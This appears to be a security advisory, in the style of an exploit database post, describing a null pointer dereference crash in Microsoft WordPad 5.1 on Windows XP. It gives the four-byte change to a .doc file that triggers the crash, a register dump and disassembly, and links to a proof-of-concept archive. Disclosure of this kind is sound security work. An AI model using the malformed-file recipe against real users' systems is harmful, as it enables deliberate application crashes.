Microsoft Wordpad 5.1 (.doc) Null Pointer Dereference Vulnerability
Found by condis
Tested on Windows XP SP 3 Proffesional PL
MS Wordpad 5.1 (Compilation 2600.xpsp.080413-2111 SP 3)
This isn't bug from CWE 2009-0259
$ Binnary diff of template file (proper empty doc document) and malformed file
(showing just the offset that differs):
0000 1200: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 -- template file
0000 1200: 00 00 00 00 00 00 63 6F 6E 64 00 00 00 00 00 00 -- proof of concept
Actually it doesn't matters (almost) what 4 bytes we will put there untill they != 0x00.
Access violation when reading [00000004]
$ Registers:
eax = 020ebb72 ebx = 00000000 ecx = 020ebb7c edx = 00090608
esi = 00000000 edi = 01bc04a8 eip = 01b9dbbb esp = 0177f5c8
ebp = 0177f5cc
$ Function dump :
01b9dbb4 55 push ebp
01b9dbb5 8bec mov ebp,esp
01b9dbb7 56 push esi
01b9dbb8 8b7508 mov esi,dword ptr [ebp+8]
01b9dbbb 807e0400 cmp byte ptr [esi+4],0 ds:0023:00000004=?? ; ---- crash
01b9dbbf 751b jne mswrd8+0x1dbdc (01b9dbdc)
01b9dbc1 8b06 mov eax,dword ptr [esi]
01b9dbc3 57 push edi
01b9dbc4 8b78fc mov edi,dword ptr [eax-4]
01b9dbc7 57 push edi
01b9dbc8 ff156010b801 call dword ptr [mswrd8+0x1060 (01b81060)]
01b9dbce 57 push edi
01b9dbcf ff157410b801 call dword ptr [mswrd8+0x1074 (01b81074)]
01b9dbd5 56 push esi
01b9dbd6 e87bfdffff call mswrd8+0x1d956 (01b9d956)
01b9dbdb 5f pop edi
01b9dbdc 5e pop esi
01b9dbdd 5d pop ebp
$ 'O, hai' goes to Echo, Varseand, cxecurity and madcow ;3
$ Below You should see link to attachement with PoC:
http://cond.psychodela.pl/d/ms-wordpad-nullptr.rar
http://www.exploit-db.com/sploits/18952.rar